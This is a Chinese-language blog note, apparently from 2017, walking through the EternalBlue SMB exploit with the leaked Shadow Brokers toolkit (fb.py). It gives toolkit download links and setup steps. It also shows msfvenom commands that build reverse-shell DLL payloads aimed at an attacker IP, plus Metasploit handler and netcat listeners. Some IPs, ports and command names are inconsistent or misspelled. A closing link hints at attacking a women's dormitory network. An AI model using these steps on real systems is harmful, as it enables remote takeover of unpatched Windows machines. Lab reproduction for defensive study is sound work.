@websec007
2017-04-19T15:10:26.000000Z
字数 2528
阅读 4309
工具收集
1、验证SMB 445端口是否开放
2、验证SMB 漏洞
3、shell反弹成功
(1) 攻击主机1:windows 2003
IP地址:192.168.31.100
(2) 攻击主机2:kali
IP地址:192.168.31.200
IP地址:192.168.31.41
环境要求:存在smb漏洞
python安装包:python-2.6.6.msi
https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi
注意:安装完python2.6.6后,请将c:\python2.6的路径添加到环境变量中。
pywin32第三方库:pywin32-221.win32-py2.6.exe
https://nchc.dl.sourceforge.net/project/pywin32/pywin32/Build%20221/pywin32-221.win32-py2.6.exe
(1)方程式ETERNALBLUE 工具包下载
https://codeload.github.com/misterch0c/shadowbroker/zip/master
(2)fb.py 环境部署
ETERNALBLUE解压
将解压后的整个ETERNALBLUE 目录下的 windows复制到攻击机win2003上“c:\python26”目录下,
新建listeningposts项目目录
在“c:\python26windows\”目录下新建一个文件名为:listeningposts的项目目录。
(3)fb.py 环境测试
打开cmd命令行
打开cmd命令行,进入目录“c:\python26windows\”下。
> cd c:\python26\windows
运行fb.py脚本
> python fb.py
能够成功运行即可。
> cd c:\python\windows\
> python fb.py
指定攻击载荷位置: c:\shell.dll
选择攻击目标主机架构:x64
DLLPaload : c:\shell.dll
Architecture: x64
> msfvenom -p windows/x64/reverse_tcp LHOST=192.168.31.100 LPORT=12345 -f dll >win.dll
将win.dll恶意程序复制到攻击主机 10.48.31.100 C:\根目录下。
在msf下开启msfpaylod监听,接收shell反弹:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
使用kali自带的msf框架,查找到shell_reverse_tcp的payload路径,然后使用msfvenom生成一个自带shell的恶意反弹程序。
\> msfconsole
\> search shell_reverse_tcp
获取到 x64位的payload路径:payload/windows/x64/shell_reverse_tcp
msfvencom -p payload/windows/x64/shell_reverse_tcp LHOST=192.168.31.100 LPORT=12345 -f dll >shell.dll
\> nc -lvvp 12345
1. 方程式ETERNALBLUE 之fb.py的复现
2. Windows漏洞实战,盲打女寝
3.i春秋视频演示与实验环境